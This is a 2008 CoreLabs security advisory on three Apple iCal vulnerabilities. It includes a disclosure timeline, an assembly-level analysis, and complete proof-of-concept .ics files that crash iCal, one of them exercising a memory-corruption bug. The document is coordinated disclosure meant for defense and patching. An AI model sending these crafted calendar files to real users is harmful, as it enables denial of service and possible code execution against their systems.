Multiple vulnerabilities in iCal

Multiple vulnerabilities in iCal


Core Security Technologies - CoreLabs Advisory

http://www.coresecurity.com/corelabs/

Advisory Information

Title: Multiple vulnerabilities in iCal
Advisory ID: CORE-2008-0126
Advisory URL: http://www.coresecurity.com/?action=item&id=2219
Date published: 2008-05-21
Date of last update: 2008-05-22
Vendors contacted: Apple Inc.
Release mode: Coordinated release

Vulnerability Information

Class: Input Validation
Remotely Exploitable: Yes (client-side)
Locally Exploitable: No
Bugtraq Name: 28629, 28632, 28633
CVE Name: CVE-2008-1035, CVE-2008-2006

Vulnerability Description

iCal is a personal calendar application from Apple Inc. included on the Mac OS X operating system. The calendar
application can be used as a stand-alone application or as a client-side component to calendar server that
lets users create and share multiple calendars and subscribe to other user's calendars. Apple's iCal uses the iCalendar standard for its calendar file format (which uses the .ics filename extension)
[1] and the CalDAV protocol for calendar sharing [2].
There is a growing number of web sites providing calendars files and open subscription to calendar updates
[3][4][5].

Three vulnerabilities discovered in the iCal application may allow un-authenticated attackers to execute arbitrary code on vulnerable
systems with (and potentially without) the assistance from the end user of the application or to repeatedly execute a denial of service attack to crash the iCal application.

The most serious of the three vulnerabilities is due to potential memory corruption resulting from a resource liberation bug that can be
triggered with a malformed .ics calendar file specially crafted by a would-be attacker.

The other two vulnerabilities lead to abnormal termination (crash) of the iCal application due to null-pointer dereference bugs triggered
while parsing a malformed .ics files.
The ability to inject and execute arbitrary code on vulnerable systems using these two vulnerabilities was researched but not proven possible.

Exploitation of these vulnerabilities in a client-side attack scenario is possible with user assistance by opening or clicking on specially crafted .ics file send over email or hosted on a malicious web server; or without direct
user assistance if a would-be attacker has the ability to legitimately add or modify calendar files on a CalDAV server.

Vulnerable packages

  • iCal application on Mac OS X versions 10.5 through 10.5.2
  • iCal application on Mac OS X server versions 10.5 through 10.5.2
  • The PoCs were tested on iCal 3.0.1 and 3.0.2

Non-vulnerable packages

  • Available through Apple security updates (see vendor information below).

Vendor Information, Solutions and Workarounds

Don't open untrusted .ics calendar files sent by mail or provided by websites.

The following information was provided verbatim by the vendor:


Availability

Apple security updates are available via the Software Update mechanism:
http://support.apple.com/kb/HT1338
Apple security updates are also available for manual download via:
http://www.apple.com/support/downloads/


Cross-References

If you provide cross-referencing information in your advisory please link to the following URL:
http://support.apple.com/kb/HT1222

Credits

These vulnerabilities were discovered and researched by Rodrigo Carvalho, from the Core Security Consulting Services (SCS) team of Core Security Technologies during Bugweek 2007. Additional research was done by Ricardo Narvaja from CORE IMPACT the Exploit Writers Team (EWT).

Technical Description / Proof of Concept Code

Three vulnerabilities discovered in the iCal application may allow un-authenticated attackers to execute arbitrary code on vulnerable systems with (and potentially without) the assistance from the end user of the application or to repeateadly execute a denial of service attack to crash the iCal application.

A client-side attack directed to the end-users of the iCal application can be executed by sending an email with a malicious .ics file attachment, by hosting a malicious .ics file on web site and directing users to open it or by injecting a malicious .ics file on a CalDAV enabled server to which potential victims are subscribed to update their calendars automatically. In the three reported cases the vulnerabilities arise from improper validation of input while or after parsing of the calendar file format.

1) Null pointer de-reference #1 (Bugtraq ID 28629, CVE-2008-2006)

Improper sanitization of integer input may lead to null pointer dereference and possibly to an application
that loses control of its execution, resulting in a denial of service.

A vulnerable .ics file will contain the following line:

    RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646
  

The COUNT value causes an integer overflow, which leads to a null pointer dereference
when iCal tries to use it after the .ics file is imported.

The following Proof of Concept (PoC) file is provided to demonstrate its feasibility, to trigger the bug import a .ics file with the following content and then select one of the created events.

BEGIN:VCALENDAR
X-WR-TIMEZONE:America/Buenos_Aires
PRODID:-//Apple Inc.//iCal 3.0//EN
CALSCALE:GREGORIAN
X-WR-CALNAME: Vulnerable
VERSION:2.0
X-WR-RELCALID:10DE4203-4FA5-4E23-AE4D-9DAE3157C9E5
METHOD:PUBLISH
BEGIN:VTIMEZONE
TZID:America/Buenos_Aires
BEGIN:DAYLIGHT
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:19991003T000000
RDATE:19991003T000000
TZNAME:ARST
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:20000303T000000
RDATE:20000303T000000
RDATE:20001231T210000
TZNAME:ART
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
SEQUENCE:4
DTSTART;TZID=America/Buenos_Aires:20071225T110000
DURATION:PT1H
UID:48878014-5F03-43E5-8639-61E708714F9A
DTSTAMP:20071213T130632Z
SUMMARY:Vuln
CREATED:20071213T130611Z
RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646
END:VEVENT
END:VCALENDAR

Analysis of the vulnerability

The above proof-of-concept file creates new events in the iCal application . When a user double-clicks on these events the program crashes writing in the memory pointed by pointer EDI=0. Only the value of EAX is under control, must be less than 0x7fffffff and is extracted from the following line of the PoC .ics file.

RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646  (0x7FFFFFFE)

__text:0013C178 push    ebp
__text:0013C179 mov     ebp, esp
__text:0013C17B sub     esp, 38h
__text:0013C17E mov     eax, ds:off_1F435C
__text:0013C183 mov     [ebp+var_4], edi
__text:0013C186 mov     edi, [ebp+arg_C]
__text:0013C189 mov     [ebp+var_8], esi
__text:0013C18C mov     esi, [ebp+arg_8]
__text:0013C18F mov     [ebp+var_C], ebx
__text:0013C192 mov     [esp+38h+var_34], eax
__text:0013C196 mov     eax, [ebp+arg_0]
__text:0013C199 mov     [esp+38h+var_28], 0
__text:0013C1A1 mov     [esp+38h+var_2C], 0

Here is written on [ebp + var28] and [ebp + var2C] and
because EBP is ESP minus 0x38, this is similar to

[ebp + var28] = [esp+0x38+var_28]
[ebp + var2C] = [esp+0x38+var_2C]

There are located the null-pointers on the stack.

BFFFEF7C var_2C dd 0
BFFFEF80 var_28 dd 0

Upon reaching the function where the crash occurs.

__text:0014ADC3 push    ebp
__text:0014ADC4 mov     ebp, esp
__text:0014ADC6 sub     esp, 48h
__text:0014ADC9 mov     eax, ds:stru_1FA2A0.superclass

Logically the zeros are still present because don't work with those values until we enter.

BFFFEF7C arg_C dd 0
BFFFEF80 arg_10 dd 0
    

We see that the function argument arg_C is loaded and moved to EDI.

0014ADE0 mov     edi, [ebp+arg_C]

And this is the location where is written at the moment of crashing further ahead, meaning that it is a zero that can't be changed.

0014AE2F mov     dword ptr [edi], 0

When getting closer to the point of crash because we control EAX and we can trigger a jump after comparing with [ebx+0Ch] and [ebx+08h].

0014AE20 cmp     eax, [ebx+0Ch]                (if it is lower than 1)
0014AE23 jl      short loc_14AE2F

0014AE25 cmp     eax, [ebx+8]                  (if it is lower than 0x270F)
0014AE2D jle     short loc_14AE37


169280B8 dd      270Fh     (ebx+08)
169280BC dd          1	 	 (ebx+0C)
    

The first comparison for JL doesn't avoid the crash zone, but anyway negative numbers can't be inserted by default and a zero value does not crash the program or even gets it near the critical zone. Any other value crashes the application when writing in the null location.

In the other case a comparison is made such that if EAX is less than 0x270f the crash zone is avoided and the program continues to work without problem. Negative values are not read and if a value greater than 0x7fffffff the maximum value is used instead.

2) Null pointer dereference #2 (Bugtraq ID 28632, CVE-2008-2006)

A vulnerable .ics file will contain the following line:

TRIGGER:-PT65535H
  

The TRIGGER value causes a null pointer dereference when iCal tries to use it after
the .ics file is imported.

The corresponding PoC follows. to trigger the bug import a .ics file with the following content then click on the 65535 on edit mode and
accept it without changes.

BEGIN:VCALENDAR
X-WR-CALNAME:Fake event
PRODID:-//Apple Inc.//iCal 3.0//EN
CALSCALE:GREGORIAN
VERSION:2.0
METHOD:PUBLISH
BEGIN:VTIMEZONE
TZID:America/Buenos_Aires
BEGIN:DAYLIGHT
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:19991003T000000
RDATE:19991003T000000
TZNAME:ARST
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:20000303T000000
RDATE:20000303T000000
RDATE:20001231T210000
TZNAME:ART
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
SEQUENCE:10
DTSTART;TZID=America/Buenos_Aires:20071225T000000
DTSTAMP:20071213T124414Z
SUMMARY:Fake Event
DTEND;TZID=America/Buenos_Aires:20071225T010000
RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1
UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9
TRANSP:OPAQUE
CREATED:20071213T124215Z
BEGIN:VALARM
X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49
ACTION:DISPLAY
DESCRIPTION:Event reminder
TRIGGER:-PT65535H
END:VALARM
END:VEVENT
END:VCALENDAR

3) Improper resource liberation (Bugtraq ID 28633, CVE-2008-1035)

This is another case of bad validation of a file with the iCalendar format that results in a more serious bug.

A vulnerable .ics file will contain the following line:

ATTACH;VALUE=URI:S=osumi
  

The corresponding PoC follows. Double-click on the .ics file with the following content, an event will be created. To crash iCal click on the newly created event and the on the alarm sound list.

BEGIN:VCALENDAR
X-WR-TIMEZONE:America/Buenos_Aires
PRODID:-//Apple Inc.//iCal 3.0//EN
CALSCALE:GREGORIAN
X-WR-CALNAME:evento falso
VERSION:2.0
X-WR-RELCALID:71CE8EAD-380B-4EA3-A123-60F9B2A03990
METHOD:PUBLISH
BEGIN:VTIMEZONE
TZID:America/Buenos_Aires
BEGIN:DAYLIGHT
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:19991003T000000
RDATE:19991003T000000
TZNAME:ARST
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:20000303T000000
RDATE:20000303T000000
RDATE:20001231T210000
TZNAME:ART
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
SEQUENCE:11
DTSTART;TZID=America/Buenos_Aires:20071225T000000
DTSTAMP:20071213T143420Z
SUMMARY:evento falso
DTEND;TZID=America/Buenos_Aires:20071225T010000
LOCATION:donde se hace
RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1
TRANSP:OPAQUE
UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9
URL;VALUE=URI:http://pepe.com:443/pepe
ATTACH;FMTTYPE=text/php;X-APPLE-CACHED=1:ical://attachments/4E3646DE-ED2
0-449C-88E7-744E62BC8C12/651D31BE-455E-45ED-99C6-55B9F03A3FA9/popote.php

CREATED:20071213T142720Z
CREATED:20071213T124215Z
BEGIN:VALARM
X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49
ACTION:DISPLAY
DESCRIPTION:Event reminder
TRIGGER:-PT15H
END:VALARM
BEGIN:VALARM
X-WR-ALARMUID:F54A0E05-57B8-4562-8E77-056B19305CD0
ACTION:AUDIO
TRIGGER:-PT15M
ATTACH;VALUE=URI:S=osumi
END:VALARM
END:VEVENT
END:VCALENDAR

Report Timeline

  • 2008-01-30:
    Core sends an initial notification that vulnerabilities were discovered in the iCal application and iCal server and that an advisory draft is available.
  • 2008-01-31:
    Vendor acknowledges and requests the draft.
  • 2008-01-31:
    Core sends the draft, including proof-of-concept files that trigger the bugs.
  • 2008-02-12:
    Core requests update info on the vulnerabilities and states that wants to coordinate the date of the disclosure.
  • 2008-02-18:
    Core requests update info on the vulnerabilities.
  • 2008-02-18:
    Vendor replies that the iCal Server (CVE-2008-1000) vulnerability is tracked for a fix in an upcoming update and the vulnerabilities in the iCal client application will be fixed in an update following the early March software update.
  • 2008-02-19:
    Core indicated that it will split the report in two security advisories. CORE-2008-0123 will address the vulnerability in iCal server (CVE-2008-1000) and will be published in coordination with the release of the vendor's March software update. The publication date for the second advisory, will dealt bydealing with the three vulnerabilities in the iCal client application will be coordinated for a date after the March update unless there are clear indications of the vulnerability being exploited in the wild, in which case if Core considers that the information provided in the advisory would help end users to decide how to react the advisory would be published sooner as a "forced release".
  • 2008-03-03:
    Core requests update info on the vulnerability, a concrete release schedule and text for the advisory section called "Vendor Information, Solutions and Workarounds".
  • 2008-03-04:
    Vendor provides information concerning CVE-2008-1000 and indicates that the bug is in the Wiki server and not the iCal Server.
  • 2008-03-13:
    Core re-schedules the publication to March 24th and requests the vendor an update on the coordinated date of disclosure. The remaining three vulnerabilities in the iCal client application will be dealt by a second security advisory (CORE-2008-0126) to be published after the release of the March software update. Publication of CORE-2008-0126 is initially slated for March 24th 2008 but the final date estimation can be discussed further with the vendor based on its estimated date for fixes.
  • 2008-03-18:
    APPLE-SA-2008-0318 software update released.
  • 2008-03-18:
    CORE-2008-0123 is published.
  • 2008-03-18:
    Vendor informs that will track the first two issues as crasher-only bugs but still intends to address them. Further details to determine if the null pointer de-reference bugs are exploitable are requested. The vendor will continue to track the third as a security bug and estimates early April for the release of the software update that fix them. Additional timing information will be provided closer to the estimated date.
  • 2008-03-18:
    Core re-schedules the publication to April 7th and indicates that should any new details about the vulnerabilities become available they will be forwarded to the vendor.
  • 2008-04-04:
    Core requests a more precise date of release of the fixes to coordinate the publication and recommends the vendor to consider the three as security bugs because it couldn't be proved that in this case the integer overflows can't be exploited.
  • 2008-04-07:
    Vendor requests that Core to postpone the advisory publication until the fix is available.
  • 2008-04-07:
    Core requests a more precise date of release of the fixes to coordinate the new publication date.
  • 2008-04-07:
    Vendor informs that the estimated date for the update is near the end of April.
  • 2008-04-08:
    Core confirms that coordinating the publication of CORE-2008-0126 for April 28th is acceptable.
  • 2008-04-16:
    Core requests an update on the release date of the fixes.
  • 2008-04-17: Vendor states that end of April is still the estimated date and provides more details that explain why the first two bugs are been considered null-pointer dereference bugs only. A value range verification is performed and out-of-range values branch execution flow to instructions that assign NULL to a pointer which later triggers a null pointer de-reference that causes the application to crash. The root cause of the crash is a NULL pointer de-reference and not an integer overflow.
  • 2008-04-17:
    Core confirms that the two first bugs can be considered crasher only due to null-pointer dereference. Upon further research it is confirmed that integer overflows are detected and do not cause the actual crashes.
  • 2008-04-17:
    Vendor asks confirmation that the first two bugs have no security related consequences.
  • 2008-04-17:
    Core responds that the three bugs still have security related consequences. The first two bugs can be abused to execute denial of service attacks by untrusted and unauthenticated third parties specifically using public servers as attack vector. Core considers bugs that allow unauthenticated third parties to crash an application to be security vulnerabilities. Core indicates that exploitation of null pointer de-reference bugs cannot be ruled out generically, a statement which could be derived from Rice's theorem.
  • 2008-04-25: Core requests an update on the release date of the fixes and sends detailed information on the analysis of the first bug.
  • 2008-04-27: Vendor estimates early May as the date of the software fixes release.
  • 2008-05-05: Core informs the vendor that it is re-scheduling the publication to May 12th as a final date unless precise information is given on the release date of the fixes.
  • 2008-05-06: Vendor responds precising that the fixes are being released sometime the following week.
  • 2008-05-07: Core states that it is not willing to re-schedule publication date unless the vendor commits to a concrete date.
  • 2008-05-10: Vendor asks Core not to publish the advisory before Apple security update is available. Vendor indicates that fixes will be released on May 19th, 2008.
  • 2008-05-10: Given that the vendor has communicated a concrete date, Core will discuss re-scheduling (for the fifth time) the publication date of the advisory.
  • 2008-05-12: Core communicates the vendor that the publication of the advisory is re-scheduled to May 21th, that date is final.
  • 2008-05-14: Vendor acknowledges reception of the last email and appreciates that Core posponed the advisory publication date.
  • 2008-05-20: Core send the final draft of the advisory to the vendor.
  • 2008-05-21:
    An edited and corrected final version of the advisory is sent to the vendor.
  • 2008-05-21: Advisory CORE-2008-0126 is published.
  • 2008-05-22: Minor errors corrected and more detailed version information added.
  • 2008-05-28: Apple Software
    Update 10.5.3 is released including a fix for CVE-2008-1035.
  • 2008-06-04:
    CVE-2008-2007 has been deprecated as duplicate of CVE-2008-1035.

References


[1]
RFC 2445: Internet Calendaring and Scheduling Core Object Specification (iCalendar) - http://tools.ietf.org/html/rfc2445


[2] RFC 4791: Calendaring Extensions to WebDAV -
http://tools.ietf.org/html/rfc4791


[3] http://www.apple.com/downloads/macosx/calendars/

[4] iCalShare http://icalshare.com/


[5] iCalWorld http://www.icalworld.com/

About CoreLabs

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs
and requirements for information security technologies. We conduct our research in several important areas
of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing,
and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions
and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/.

About Core Security Technologies

Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide
develop and maintain a proactive process for securing their networks. The company's flagship product,
CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing.
CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed.
It enables organizations to determine if current security investments are detecting and preventing attacks.
Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration
testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies
can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.

Disclaimer

The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs,
and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is
available for download at /legacy/files/attachments/core_security_advisories.asc.

Locally Exploitable: 
no
Remotely Exploitable: 
no
  • Book Demo

Research Blog